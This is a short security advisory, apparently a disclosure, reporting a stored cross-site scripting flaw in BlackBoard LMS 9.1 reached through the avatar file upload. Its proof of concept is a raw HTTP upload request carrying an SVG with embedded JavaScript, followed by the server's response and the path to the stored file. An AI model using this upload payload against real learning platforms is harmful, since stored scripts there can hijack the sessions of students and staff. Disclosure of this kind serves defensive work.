BlackBoard LMS version 9.1.140152.0 suffers from a cross site scripting vulnerability that can be leveraged through an arbitrary file upload.
47c8d7b954b0a809a7d3aef677b80ea4Document Title:
===============
BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload
Product Description:
===============
The Learning Management System has changed the way students and
educators interact.
Blackboard's LMS solutions offer much more than simple, classroom interaction,
they support the entire education experience enabling educators to not
only interact,
but truly engage their students in learning.
Homepage: http://www.blackboard.com/learning-management-system/index.aspx
PoC:
===============
POST /webapps/Bb-sites-user-profile-BBLEARN/uploadAvatar.do HTTP/1.1
Host: www.coursesites.com
------WebKitFormBoundaryMB47ytMHFUAG9AAt
Content-Disposition: form-data; name="avatarFile"; filename="badsv2.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("ismail1337");
</script>
</svg>
------WebKitFormBoundaryMB47ytMHFUAG9AAt--
Response:
{"success":true,"message":"/bbcswebdav/users/your_user_id/public_html/badsv2.svg"}
Navigate to the returned URL path:
https://www.coursesites.com/bbcswebdav/users/your_user_id
/public_html/badsv2.svg